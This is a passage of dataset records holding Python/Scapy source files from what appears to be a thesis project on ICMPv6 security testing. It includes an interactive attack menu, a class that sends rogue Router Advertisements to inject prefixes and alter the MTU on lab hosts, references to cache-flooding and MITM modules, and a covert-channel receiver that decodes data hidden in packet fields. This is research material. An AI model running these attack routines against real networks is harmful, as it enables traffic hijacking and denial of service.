Command not found!'\n\n    def showHelp(self):\n        for entry in Help.getCovertChannelHelp():\n            print entry\n\n\n\"\"\"\nclass responsible for Attacking Channel module\n\"\"\"\nclass AttackingChannel:\n\n    def __init__(self, iface):\n        self.name = 'Attacking'\n        self.iface = iface\n\n    #starts the interactive prompt\n    def startSystem(self):\n        Commands.setAttackingChannelHistory()\n        running = 1\n        while running:\n            readline.parse_and_bind(\"tab: complete\")\n            #we receive data from the keyboard \n            command = raw_input(self.name + ' >>')\n            #help command\n            if re.match('help', command):\n                self.showHelp()\n            #quit module command\n            elif re.match('quit', command):\n                running = 0\n                Commands.setMainHistory()\n            #set all Neighbor Discovery tests\n            elif re.match(r'setNeighborDiscovery', command):\n                neighDisc = NeighborDiscoveryAttacks(self.iface)\n                neighDisc.startSystem()\n            #set all Informational and Error tests\n            elif re.match(r'setInfoAndError', command):\n                infoError = InfoAndErrorAttacks(self.iface)\n                infoError.startSystem()\n            else:\n                print 'Error! Command not found!'\n\n    def showHelp(self):\n        for entry in Help.getAttackingChannelHelp():\n            print entry\n" }, { "alpha_fraction": 0.5785372853279114, "alphanum_fraction": 0.5788914561271667, "avg_line_length": 39.91304397583008, "blob_id": "dbd1f6822e21d38143dc1bfcf7d49cec6b916e1c", "content_id": "263521bfaa731a244650f7de294ad4f666043011", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"Python", "length_bytes": 5647, "license_type": "no_license", "max_line_length": 78, "num_lines": 138, "path": "/python/code/neighbDisc.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\nimport re, uuid\nimport os\nimport readline\nfrom pprint import pprint\nfrom commands import *\nfrom RAAttacks import *\nfrom RSAttacks import *\nfrom NAAttacks import *\nfrom NSAttacks import *\nfrom redirectAttacks import *\n\n\"\"\"\nThis is general class to start Neighbor Discovery protocol tests.\nThe linuxInterface and windwosInterface variables must be changed accordingly.\n\"\"\"\nclass NeighborDiscoveryAttacks:\n\n def __init__(self, iface):\n self.iface = iface\n self.name = 'NeighborDiscovery'\n\n def startSystem(self):\n Commands.setNeighborDiscoveryAttacksHistory()\n running = 1\n while running:\n readline.parse_and_bind(\"tab: complete\")\n #we receive data from the keyboard \n command = raw_input(self.name + ' >>')\n #help command\n if re.match('help', command):\n self.showHelp()\n #quit module command\n elif re.match('quit', command):\n running = 0\n Commands.setAttackingChannelHistory()\n\n #-----Router Advertisement section-----\n \n #execution of RA with Prefix internal verification\n elif re.match('execRAPrefixInternalWin', command):\n ra = RA()\n ra.execModuleInternalPrefixWin(self.iface)\n elif re.match('execRAPrefixInternalLinux', command):\n ra = RA()\n ra.execModuleInternalPrefixLinux(self.iface)\n #execution of RA with MTU internal verification\n elif re.match('execRAMTUInternalWin', command):\n ra = RA()\n ra.execModuleInternalMTUWin(self.iface)\n elif re.match('execRAMTUInternalLinux', command):\n ra = RA()\n ra.execModuleInternalMTULinux(self.iface)\n #execution of remote RA with Prefix tests \n elif re.match('execRAPrefixRemoteWin', command):\n ra = RA()\n ra.execModuleRemotePrefixWin(self.iface)\n elif re.match('execRAPrefixRemoteLinux', command):\n ra = RA()\n ra.execModuleRemotePrefixLinux(self.iface)\n #execution of remote RA with MTU tests\n elif re.match('execRAMTURemoteWin', command):\n ra = RA()\n ra.execModuleRemoteMTUWin(self.iface)\n elif re.match('execRAMTURemoteLinux', command):\n ra = RA()\n ra.execModuleRemoteMTULinux(self.iface)\n\n #-----Router Solicitation section-----\n \n #execution of RS with internal verification\n elif re.match('execRSInternalWin', command):\n ra = RS()\n ra.execModuleInternalWin(self.iface)\n elif re.match('execRSInternalLinux', command):\n ra = RS()\n ra.execModuleInternalLinux(self.iface)\n elif re.match('execRSInternalFirewall', command):\n ra = RS()\n ra.execModuleInternalFirewall(self.iface)\n\n #-----Neighbor Advertisement section-----\n\n #execution of Cache Flooding with internal NAs\n elif re.match('execNACacheFloodingInternalWin', command):\n na = NA()\n na.execModuleInternalCacheFloodingWin(self.iface)\n elif re.match('execNACacheFloodingInternalLinux', command):\n na = NA()\n na.execModuleInternalCacheFloodingLinux(self.iface)\n #execution of Win Mitm with internal NAs\n elif re.match('execNAWinMitmInternal', command):\n na = NA()\n na.execModuleInternalWinMitm(self.iface)\n #execution of Cache Flooding with remote NAs to linux internal\n elif re.match('execNACacheFloodingRemoteLinux', command):\n na = NA()\n na.execModuleRemoteLinuxCacheFlooding(self.iface)\n \n #-----Neighbor Solicitation section-----\n \n #execution of NS internal test\n elif re.match('execNSInternalFloodingWin', command):\n ns = NS()\n ns.execModuleInternalCacheFloodingWin(self.iface)\n elif 
re.match('execNSInternalFloodingLinux', command):\n                ns = NS()\n                ns.execModuleInternalCacheFloodingLinux(self.iface)\n            elif re.match('execNSInternalSelfSolWin', command):\n                ns = NS()\n                ns.execModuleInternalWinSelfSol(self.iface)\n            elif re.match('execNSInternalSelfSolLinux', command):\n                ns = NS()\n                ns.execModuleInternalLinuxSelfSol(self.iface)\n            #execution of NS external test\n            elif re.match('execNSRemoteSelfSolLinux', command):\n                ns = NS()\n                ns.execModuleRemoteLinuxSelfSol(self.iface)\n\n            #-----Redirect section-----\n\n            #execution of Redirect internal test\n            elif re.match('execRedirectInternalWin', command):\n                redirect = Redirect()\n                redirect.execModuleInternalWin(self.iface)\n            #execution of Redirect remote test\n            elif re.match('execRedirectRemoteWin', command):\n                redirect = Redirect()\n                redirect.execModuleRemoteWin(self.iface)\n            elif re.match('execRedirectRemoteLinux', command):\n                redirect = Redirect()\n                redirect.execModuleRemoteLinux(self.iface)\n        \n    def showHelp(self):\n        for entry in Help.getNeighborDiscoveryAttacksHelp():\n            print entry\n\n" }, { "alpha_fraction": 0.4955225884914398, "alphanum_fraction": 0.5087260603904724, "avg_line_length": 40.4607048034668, "blob_id": "01a7524e55c853176f99229c8c5009a5e34c2904", "content_id": "d72909db16a681ee334f9d5f711b0a17f572f133", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15299, "license_type": "no_license", "max_line_length": 121, "num_lines": 369, "path": "/python/code/receiver.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\nimport re, uuid\nimport os\nimport readline\nfrom pprint import pprint\nfrom commands import *\nfrom scapy.all import *\nfrom bitstring import *\n\nclass Receiver:\n\n    def __init__(self, iface, adr):\n        self.iface = iface\n        self.ipAdr = adr\n        self.containerBits = ''\n\n    def packet_callback(self, packet):\n        if ICMPv6DestUnreach in packet[0]:\n            code = packet[ICMPv6DestUnreach].code\n            length = packet[ICMPv6DestUnreach].length\n            unused = packet[ICMPv6DestUnreach].unused\n            #payload = packet[ICMPv6DestUnreach].load\n            bitLength = 8\n            container = self.extractBytes(code, bitLength)\n            for item in container:\n                sys.stdout.write(chr(item))\n                sys.stdout.flush()\n            bitLength = 8\n            container = self.extractBytes(length, bitLength)\n            for item in container:\n                sys.stdout.write(chr(item))\n                sys.stdout.flush()\n            bitLength = 24\n            container = self.extractBytes(unused, bitLength)\n            for item in container:\n                sys.stdout.write(chr(item))\n                sys.stdout.flush()\n            bitLength = 64\n            #if payload != 'x':\n            #    try:\n            #        payload = int(payload)\n            #        container = self.extractBytes(payload, bitLength)\n            #        for item in container:\n            #            sys.stdout.write(chr(item))\n            #            sys.stdout.flush\n            #    except:\n            #        pass\n        elif ICMPv6PacketTooBig in packet[0]:\n            code = packet[ICMPv6PacketTooBig].code\n            mtu = packet[ICMPv6PacketTooBig].mtu\n            sys.stdout.write(chr(code))\n            sys.stdout.flush()\n            if mtu !=1280:\n                bitLength = 32\n                container = self.extractBytes(mtu, bitLength)\n                for item in container:\n                    sys.stdout.write(chr(item))\n                    sys.stdout.flush()\n        elif ICMPv6TimeExceeded in packet[0]:\n            code = packet[ICMPv6TimeExceeded].code\n            length = packet[ICMPv6TimeExceeded].length\n            unused = packet[ICMPv6TimeExceeded].unused\n            #payload = packet[ICMPv6TimeExceeded].load\n            sys.stdout.write(chr(code))\n            sys.stdout.flush()\n            bitLength = 8\n            container = self.extractBytes(length, bitLength)\n            for item in container:\n                sys.stdout.write(chr(item))\n                sys.stdout.flush()\n            bitLength = 24\n            container = 
self.extractBytes(unused, bitLength)\n            for item in container:\n                sys.stdout.write(chr(item))\n                sys.stdout.flush()\n            # bitLength = 64\n            # if payload != 'x':\n            #     payload = int(payload)\n            #     container = self.extractBytes(payload, bitLength)\n            #     for item in container:\n            #         sys.stdout.write(chr(item))\n            #         sys.stdout.flush\n        elif ICMPv6ParamProblem in packet[0]:\n            code = packet[ICMPv6ParamProblem].code\n            pointer = packet[ICMPv6ParamProblem].ptr\n            sys.stdout.write(chr(code))\n            sys.stdout.flush()\n            if code == 0:\n                bitLength = 32\n                container = self.extractBytes(pointer, bitLength)\n                for item in container:\n                    sys.stdout.write(chr(item))\n                    sys.stdout.flush()\n        elif ICMPv6EchoRequest in packet[0]:\n            code = packet[ICMPv6EchoRequest].code\n            idn = packet[ICMPv6EchoRequest].id\n            seq = packet[ICMPv6EchoRequest].seq\n            data = packet[ICMPv6EchoRequest].data\n            sys.stdout.write(chr(code))\n            sys.stdout.flush()\n            bitLength = 16\n            container = self.extractBytes(idn, bitLength)\n            for item in container:\n                sys.stdout.write(chr(item))\n                sys.stdout.flush()\n            bitLength = 16\n            container = self.extractBytes(seq, bitLength)\n            for item in container:\n                sys.stdout.write(chr(item))\n                sys.stdout.flush()\n            if(data):\n                #this because scapy internals transform it in string before sending\n                data = int(data)\n                bitLength = 64\n                container = self.extractBytes(data, bitLength)\n                for item in container:\n                    sys.stdout.write(chr(item))\n                    sys.stdout.flush()\n        elif ICMPv6EchoReply in packet[0]:\n            code = packet[ICMPv6EchoReply].code\n            idn = packet[ICMPv6EchoReply].id\n            seq = packet[ICMPv6EchoReply].seq\n            data = packet[ICMPv6EchoReply].data\n            sys.stdout.write(chr(code))\n            sys.stdout.flush()\n            bitLength = 16\n            container = self.extractBytes(idn, bitLength)\n            for item in container:\n                sys.stdout.write(chr(item))\n                sys.stdout.flush()\n            bitLength = 16\n            container = self.extractBytes(seq, bitLength)\n            for item in container:\n                sys.stdout.write(chr(item))\n                sys.stdout.flush()\n            if(data):\n                #this because scapy internals transform it in string before sending\n                data = int(data)\n                bitLength = 64\n                container = self.extractBytes(data, bitLength)\n                for item in container:\n                    sys.stdout.write(chr(item))\n                    sys.stdout.flush()\n        elif ICMPv6ND_RS in packet[0]:\n            code = packet[ICMPv6ND_RS].code\n            res = packet[ICMPv6ND_RS].res\n            sys.stdout.write(chr(code))\n            sys.stdout.flush()\n            bitLength = 32\n            container = self.extractBytes(res, bitLength)\n            for item in container:\n                sys.stdout.write(chr(item))\n                sys.stdout.flush()\n        elif ICMPv6ND_RA in packet[0]:\n            code = packet[ICMPv6ND_RA].code\n            chlim = packet[ICMPv6ND_RA].chlim\n            M = packet[ICMPv6ND_RA].M\n            O = packet[ICMPv6ND_RA].O\n            H = packet[ICMPv6ND_RA].H\n            prf = packet[ICMPv6ND_RA].prf\n            P = packet[ICMPv6ND_RA].P\n            res = packet[ICMPv6ND_RA].res\n            routerlifetime = packet[ICMPv6ND_RA].routerlifetime\n            reachabletime = packet[ICMPv6ND_RA].reachabletime\n            retranstimer = packet[ICMPv6ND_RA].retranstimer\n            if code not in range(1,7):\n                bitLength = 8\n                container = self.extractBytes(code, bitLength)\n                for item in container:\n                    sys.stdout.write(chr(item))\n                    sys.stdout.flush()\n            bitLength = 8\n            container = self.extractBytes(chlim, bitLength)\n            for item in container:\n                sys.stdout.write(chr(item))\n                sys.stdout.flush()\n            if code == 1:\n                self.containerBits += str(M)\n                if len(self.containerBits) == 8:\n                    container = self.extractBytes(int(self.containerBits, 2), 8)\n                    for item in container:\n                        sys.stdout.write(chr(item))\n                        sys.stdout.flush()\n                    self.containerBits = ''\n            elif code == 2:\n                self.containerBits += str(O)\n                if len(self.containerBits) == 8:\n                    container = 
self.extractBytes(int(self.containerBits, 2), 8)\n                    for item in container:\n                        sys.stdout.write(chr(item))\n                        sys.stdout.flush()\n                    self.containerBits = ''\n            elif code == 3:\n                self.containerBits += str(H)\n                if len(self.containerBits) == 8:\n                    container = self.extractBytes(int(self.containerBits, 2), 8)\n                    for item in container:\n                        sys.stdout.write(chr(item))\n                        sys.stdout.flush()\n                    self.containerBits = ''\n            elif code == 4:\n                tmpBit = BitArray(uint=prf, length=2)\n                self.containerBits += tmpBit.bin\n                if len(self.containerBits) == 8:\n                    container = self.extractBytes(int(self.containerBits, 2), 8)\n                    for item in container:\n                        sys.stdout.write(chr(item))\n                        sys.stdout.flush()\n                    self.containerBits = ''\n            elif code == 5:\n                self.containerBits += str(P)\n                if len(self.containerBits) == 8:\n                    container = self.extractBytes(int(self.containerBits, 2), 8)\n                    for item in container:\n                        sys.stdout.write(chr(item))\n                        sys.stdout.flush()\n                    self.containerBits = ''\n            elif code == 6:\n                tmpBit = BitArray(uint=res, length=2)\n                self.containerBits += tmpBit.bin\n                if len(self.containerBits) == 8:\n                    container = self.extractBytes(int(self.containerBits, 2), 8)\n                    for item in container:\n                        sys.stdout.write(chr(item))\n                        sys.stdout.flush()\n                    self.containerBits = ''\n            bitLength = 16\n            container = self.extractBytes(routerlifetime, bitLength)\n            for item in container:\n                sys.stdout.write(chr(item))\n                sys.stdout.flush()\n            bitLength = 32\n            container = self.extractBytes(reachabletime, bitLength)\n            for item in container:\n                sys.stdout.write(chr(item))\n                sys.stdout.flush()\n            bitLength = 32\n            container = self.extractBytes(retranstimer, bitLength)\n            for item in container:\n                sys.stdout.write(chr(item))\n                sys.stdout.flush()\n        elif ICMPv6ND_NS in packet[0]:\n            code = packet[ICMPv6ND_NS].code\n            res = packet[ICMPv6ND_NS].res\n            tgt = packet[ICMPv6ND_NS].tgt\n            sys.stdout.write(chr(code))\n            sys.stdout.flush()\n            #it seems that scapy neighbor solicitation reserved field uses only 24 bits (ver 2.3.2)\n            #requires version 2.3.2-dev\n            bitLength = 32\n            container = self.extractBytes(res, bitLength)\n            for item in container:\n                sys.stdout.write(chr(item))\n                sys.stdout.flush()\n            bitLength = 128\n            container = self.extractBytesAddress(tgt, bitLength)\n            if container:\n                for item in container:\n                    sys.stdout.write(chr(item))\n                    sys.stdout.flush()\n        elif ICMPv6ND_NA in packet[0]:\n            code = packet[ICMPv6ND_NA].code\n            res = packet[ICMPv6ND_NA].res\n            R = packet[ICMPv6ND_NA].R\n            S = packet[ICMPv6ND_NA].S\n            O = packet[ICMPv6ND_NA].O\n            tgt = packet[ICMPv6ND_NA].tgt\n            if code not in range(1,4):\n                sys.stdout.write(chr(code))\n                sys.stdout.flush()\n            bitLength = 24\n            container = self.extractBytes(res, bitLength)\n            for item in 
container:\n                sys.stdout.write(chr(item))\n                sys.stdout.flush()\n            if code == 1:\n                self.containerBits += str(R)\n                if len(self.containerBits) == 8:\n                    container = self.extractBytes(int(self.containerBits, 2), 8)\n                    for item in container:\n                        sys.stdout.write(chr(item))\n                        sys.stdout.flush()\n                    self.containerBits = ''\n            if code == 2:\n                self.containerBits += str(S)\n                if len(self.containerBits) == 8:\n                    container = self.extractBytes(int(self.containerBits, 2), 8)\n                    for item in container:\n                        sys.stdout.write(chr(item))\n                        sys.stdout.flush()\n                    self.containerBits = ''\n            if code == 3:\n                self.containerBits += str(O)\n                if len(self.containerBits) == 8:\n                    container = self.extractBytes(int(self.containerBits, 2), 8)\n                    for item in container:\n                        sys.stdout.write(chr(item))\n                        sys.stdout.flush()\n                    self.containerBits = ''\n            bitLength = 128\n            container = self.extractBytesAddress(tgt, bitLength)\n            if container:\n                for item in 
container:\n                    sys.stdout.write(chr(item))\n                    sys.stdout.flush()\n        elif ICMPv6ND_Redirect in packet[0]:\n            code = packet[ICMPv6ND_Redirect].code\n            res = packet[ICMPv6ND_Redirect].res\n            tgt = packet[ICMPv6ND_Redirect].tgt\n            dst = packet[ICMPv6ND_Redirect].dst\n            sys.stdout.write(chr(code))\n            sys.stdout.flush()\n            bitLength = 32\n            container = self.extractBytes(res, bitLength)\n            for item in container:\n                sys.stdout.write(chr(item))\n                sys.stdout.flush()\n            bitLength = 128\n            container = self.extractBytesAddress(tgt, bitLength)\n            if container:\n                for item in container:\n                    sys.stdout.write(chr(item))\n                    sys.stdout.flush()\n            bitLength = 128\n            container = self.extractBytesAddress(dst, bitLength)\n            if container:\n                for item in container:\n                    sys.stdout.write(chr(item))\n                    sys.stdout.flush()\n\n    def receive(self):\n        sniff(iface=self.iface, filter='ip6 and dst '+self.ipAdr, prn=self.packet_callback, store=0)\n\n    \"\"\"\n    transform an int into a binary string of the given bit length, then turn each byte back into an int\n    \"\"\"\n    def extractBytes(self, data, bitsLength):\n        binary = BitArray(uint=data, length=bitsLength)\n        bytesNum = bitsLength/8\n        container = []\n        for x in range(0, bytesNum):\n            f = x*8\n            s = (x+1)*8\n            value = binary[f:s]\n            container.append(int(value.bin, 2))\n        return container\n\n    \"\"\"\n    split on the colons and strip them out, skipping chunks that are 0 or 1 (added to send a regular IPv6 address); transform each chunk to binary \n    using its hex value and build the container with each int value\n    \"\"\"\n    def extractBytesAddress(self, data, bitsLength):\n        dataList = data.split(\":\")\n        dataString = ''\n        container = []\n        for d in dataList:\n            if d and d != '0' and d != '1':\n                #len is 1 because scapy takes away leading 0s in ipv6 address\n                if len(d) == 1:\n                    d = '0'+d\n                binary = BitArray(hex=d)\n                for x in range(0, len(binary)/8):\n                    f = x*8\n                    s = (x+1)*8\n                    value = binary[f:s]\n                    container.append(int(value.bin, 2))\n        return container\n" }, { "alpha_fraction": 0.5574007034301758, "alphanum_fraction": 0.5588447451591492, "avg_line_length": 28.46808433532715, "blob_id": "cb37995204a6c46886775444dc75f3a748fecdb3", "content_id": "69a7687adc5c47af9040fc4f0be2b88d8497cdce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1385, "license_type": "no_license", "max_line_length": 66, "num_lines": 47, "path": "/python/code/modules.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\nimport re, uuid\nimport os\nimport readline\nfrom pprint import pprint\nfrom commands import *\nfrom scapy.all import *\nfrom testingFramework import *\n\n\"\"\"\nclass responsible for the testing framework\n\"\"\"\nclass TestingFramework:\n\n    def __init__(self, iface):\n        self.name = 'Testing'\n        self.iface = iface\n    \n    #starts the interactive prompt\n    def startSystem(self):\n        Commands.setTestingFrameworkHistory()\n        running = 1\n        while running:\n            readline.parse_and_bind(\"tab: complete\")\n            #we receive data from the keyboard \n            command = raw_input(self.name + ' >>')\n            #help command\n            if re.match('help', command):\n                self.showHelp()\n            #quit module command\n            elif re.match('quit', command):\n                running = 0\n                Commands.setMainHistory()\n            elif re.match('covert', command):\n                channel = CovertChannel(self.iface)\n                channel.startSystem() \n            elif re.match('attacking', command):\n                channel = AttackingChannel(self.iface)\n                channel.startSystem()\n            else:\n                print 'Error! 
Command not found!'\n\n    def showHelp(self):\n        for entry in Help.getTestingFrameworkHelp():\n            print entry\n" }, { "alpha_fraction": 0.6369743943214417, "alphanum_fraction": 0.683130145072937, "avg_line_length": 48.0121955871582, "blob_id": "1eed33ac1354da26acc395a638d8f1060e348857", "content_id": "f4166f37e44e829a244d7c4a9675ed9623eed4d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8038, "license_type": "no_license", "max_line_length": 197, "num_lines": 164, "path": "/python/code/RAAttacks.py~", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom scapy.all import *\n\n\n\"\"\"\nThis class tests change/addition of prefix and MTU value with Router Advertisement.\n\"\"\" \nclass RA:\n    \n    def __init__(self):\n        self.linux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\n        self.win = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n        self.firewall = \"2001:abcd:acad:2::1\"\n        self.firewallMac = \"08:00:27:b1:da:41\"\n        self.linkFirewall = \"fe80::1\"\n        print 'Router Advertisement'\n\n    #test to verify the possibility of exploitation, to be done in internal network\n    def buildPacketInternalPrefix(self, ipAdr):\n        return IPv6(dst=ipAdr,src=self.linkFirewall)/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefixlen=64,L=1,A=1,R=1,prefix=\"2001:abcd:1234:1::\")/ICMPv6NDOptSrcLLAddr(lladdr=self.firewallMac)\n\n    #test with link-local of firewall internal interface\n    def buildPacketPrefix1(self, ipAdr):\n        return IPv6(dst=ipAdr,src=self.linkFirewall)/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefixlen=64,L=1,A=1,R=1,prefix=\"2001:abcd:1234:2::\")/ICMPv6NDOptSrcLLAddr(lladdr=self.firewallMac)\n\n    #test with invalid link-local\n    def buildPacketPrefix2(self, ipAdr):\n        return IPv6(dst=ipAdr,src=\"fe80::a00:27bc:fefb:81f7\")/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefixlen=64,L=1,A=1,R=1,prefix=\"2001:abcd:1234:3::\")/ICMPv6NDOptSrcLLAddr(lladdr=self.firewallMac)\n\n    #test with global unicast of firewall internal int\n    def buildPacketPrefix3(self, ipAdr):\n        return IPv6(dst=ipAdr,src=self.firewall)/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefixlen=64,L=1,A=1,R=1,prefix=\"2001:abcd:1234:4::\")/ICMPv6NDOptSrcLLAddr(lladdr=self.firewallMac)\n\n    #test with global unicast of debian linux\n    def buildPacketPrefix4(self, ipAdr):\n        return IPv6(dst=ipAdr,src=self.linux)/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefixlen=64,L=1,A=1,R=1,prefix=\"2001:abcd:1234:5::\")/ICMPv6NDOptSrcLLAddr(lladdr=self.firewallMac)\n\n    #test with global unicast of windows 7\n    def buildPacketPrefix5(self, ipAdr):\n        return IPv6(dst=ipAdr,src=self.win)/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefixlen=64,L=1,A=1,R=1,prefix=\"2001:abcd:1234:6::\")/ICMPv6NDOptSrcLLAddr(lladdr=self.firewallMac)\n\n    #test with global unicast of firewall internal int L flag is 0\n    def buildPacketPrefix6(self, ipAdr):\n        return IPv6(dst=ipAdr,src=self.firewall)/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefixlen=64,L=0,A=1,R=1,prefix=\"2001:abcd:1234:7::\")/ICMPv6NDOptSrcLLAddr(lladdr=self.firewallMac)\n\n    #test with global unicast of firewall internal int R flag is 0\n    def buildPacketPrefix7(self, ipAdr):\n        return IPv6(dst=ipAdr,src=self.firewall)/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefixlen=64,L=1,A=1,R=0,prefix=\"2001:abcd:1234:8::\")/ICMPv6NDOptSrcLLAddr(lladdr=self.firewallMac)\n\n    #test with global unicast of firewall internal int L and R flags are 0\n    def buildPacketPrefix8(self, ipAdr):\n        return 
IPv6(dst=ipAdr,src=self.firewall)/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefixlen=64,L=0,A=1,R=0,prefix=\"2001:abcd:1234:9::\")/ICMPv6NDOptSrcLLAddr(lladdr=self.firewallMac)\n\n\n    #test to verify the possibility of exploitation, to be done in internal network\n    def buildPacketInternalMTU(self, ipAdr):\n        return IPv6(dst=ipAdr,src=self.linkFirewall)/ICMPv6ND_RA()/ICMPv6NDOptMTU(mtu=1350)\n\n    #test with global unicast of firewall internal interface\n    def buildPacketRemoteMTU(self, ipAdr):\n        return IPv6(dst=ipAdr,src=self.firewall)/ICMPv6ND_RA()/ICMPv6NDOptMTU(mtu=1360)\n\n    \n    def execModuleInternalPrefixWin(self, exitIface):\n        packetContainer = self.buildPacketInternalPrefix(self.win)\n        for t in range(1,100):\n            send(packetContainer, iface=exitIface, verbose=False)\n\n    def execModuleInternalPrefixLinux(self, exitIface):\n        packetContainer = self.buildPacketInternalPrefix(self.linux)\n        for t in range(1,100):\n            send(packetContainer, iface=exitIface, verbose=False)\n\n    def execModuleInternalMTUWin(self, exitIface):\n        packetContainer = self.buildPacketInternalMTU(self.win)\n        for t in range(1,100):\n            send(packetContainer, iface=exitIface, verbose=False)\n\n    def execModuleInternalMTULinux(self, exitIface):\n        packetContainer = self.buildPacketInternalMTU(self.linux)\n        for t in range(1,100):\n            send(packetContainer, iface=exitIface, verbose=False)\n\n    #interfaces for the experiment \n    def execModuleRemotePrefixWin(self, exitIface):\n        print \"{}\".format(\"Test 1\")\n        packetContainer = self.buildPacketPrefix1(self.win)\n        for t in range(1,100):\n            send(packetContainer, iface=exitIface, verbose=False)\n        print \"{}\".format(\"Test 2\")\n        packetContainer = self.buildPacketPrefix2(self.win)\n        for t in range(1,100):\n            send(packetContainer, iface=exitIface, verbose=False)\n        print \"{}\".format(\"Test 3\")\n        packetContainer = self.buildPacketPrefix3(self.win)\n        for t in range(1,100):\n            send(packetContainer, iface=exitIface, verbose=False)\n        print \"{}\".format(\"Test 4\")\n        packetContainer = self.buildPacketPrefix4(self.win)\n        for t in range(1,100):\n            send(packetContainer, iface=exitIface, verbose=False)\n        print \"{}\".format(\"Test 5\")\n        packetContainer = self.buildPacketPrefix5(self.win)\n        for t in range(1,100):\n            send(packetContainer, iface=exitIface, verbose=False)\n        print \"{}\".format(\"Test 6\")\n        packetContainer = self.buildPacketPrefix6(self.win)\n        for t in range(1,100):\n            send(packetContainer, iface=exitIface, verbose=False)\n        print \"{}\".format(\"Test 7\")\n        packetContainer = self.buildPacketPrefix7(self.win)\n        for t in range(1,100):\n            send(packetContainer, iface=exitIface, verbose=False)\n        print \"{}\".format(\"Test 8\")\n        packetContainer = self.buildPacketPrefix8(self.win)\n        for t in range(1,100):\n            send(packetContainer, iface=exitIface, verbose=False)\n    \n\n    def execModuleRemotePrefixLinux(self, exitIface):\n        print \"{}\".format(\"Test 1\")\n        packetContainer = self.buildPacketPrefix1(self.linux)\n        for t in range(1,100):\n            send(packetContainer, iface=exitIface, verbose=False)\n        print \"{}\".format(\"Test 2\")\n        packetContainer = self.buildPacketPrefix2(self.linux)\n        for t in range(1,100):\n            send(packetContainer, iface=exitIface, verbose=False)\n        print \"{}\".format(\"Test 3\")\n        packetContainer = self.buildPacketPrefix3(self.linux)\n        for t in range(1,100):\n            send(packetContainer, iface=exitIface, verbose=False)\n        print \"{}\".format(\"Test 4\")\n        packetContainer = self.buildPacketPrefix4(self.linux)\n        for t in range(1,100):\n            send(packetContainer, iface=exitIface, verbose=False)\n        print 
\"{}\".format(\"Test 5\")\n packetContainer = self.buildPacketPrefix5(self.linux)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n print \"{}\".format(\"Test 6\")\n packetContainer = self.buildPacketPrefix6(self.linux)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n print \"{}\".format(\"Test 7\")\n packetContainer = self.buildPacketPrefix7(self.linux)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n print \"{}\".format(\"Test 8\")\n packetContainer = self.buildPacketPrefix8(self.linux)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n \n\n def execModuleRemoteMTUWin(self, exitIface):\n packetContainer = self.buildPacketRemoteMTU(self.win)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleRemoteMTULinux(self, exitIface):\n packetContainer = self.buildPacketRemoteMTU(self.linux)\n for t in range(1,100):\n send(packetContainer, iface=exitIface, verbose=False)\n" }, { "alpha_fraction": 0.6305761933326721, "alphanum_fraction": 0.6308509707450867, "avg_line_length": 51.73429870605469, "blob_id": "51f5ed74537f26ed285b51a19939d19b55153868", "content_id": "ed5de2f949096019d1a6100ddb7a50f540497e31", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10917, "license_type": "no_license", "max_line_length": 88, "num_lines": 207, "path": "/python/code/infoAndErrorAttacks.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\nimport re, uuid\nimport os\nimport readline\nfrom pprint import pprint\nfrom commands import *\nfrom echoReply import *\nfrom destinationUnreach import *\nfrom packetTooBig import *\nfrom timeExceeded import *\nfrom parameterProblem import *\nfrom echoRequest import *\n\n\"\"\"\nThis is general class to start Informational and Error ICMPv6 message type tests.\n\"\"\"\nclass InfoAndErrorAttacks:\n\n def __init__(self, iface):\n self.iface = iface\n self.name = 'InfoAndErrorAttacks'\n\n def startSystem(self):\n Commands.setInfoAndErrorAttacksHistory()\n running = 1\n while running:\n readline.parse_and_bind(\"tab: complete\")\n #we receive data from the keyboard \n command = raw_input(self.name + ' >>')\n #help command\n if re.match('help', command):\n self.showHelp()\n #quit module command\n elif re.match('quit', command):\n running = 0\n Commands.setAttackingChannelHistory()\n elif re.match('execEchoReplyRemoteWin', command):\n er = EchoReply()\n er.execModuleEchoReplyWin(self.iface)\n elif re.match('execDestUnreachAllWin', command):\n du = DestinationUnreach() \n du.execAllWindows(self.iface)\n elif re.match('execDestUnreachAllLinux', command):\n du = DestinationUnreach()\n du.execAllLinux(self.iface)\n elif re.match('execDestUnreachBadCodeWin', command):\n du = DestinationUnreach() \n du.execDestUnreachBadCodeWin(self.iface)\n elif re.match('execDestUnreachBadCodeLinux', command):\n du = DestinationUnreach()\n du.execDestUnreachBadCodeLinux(self.iface)\n elif re.match('execDestUnreachDifferentLengthLinux', command):\n du = DestinationUnreach()\n du.execDestUnreachLengthLinux(self.iface)\n elif re.match('execDestUnreachDifferentLengthWin', command):\n du = DestinationUnreach()\n du.execDestUnreachLengthWin(self.iface)\n elif re.match('execDestUnreachNoRouteWin', command):\n du = DestinationUnreach()\n 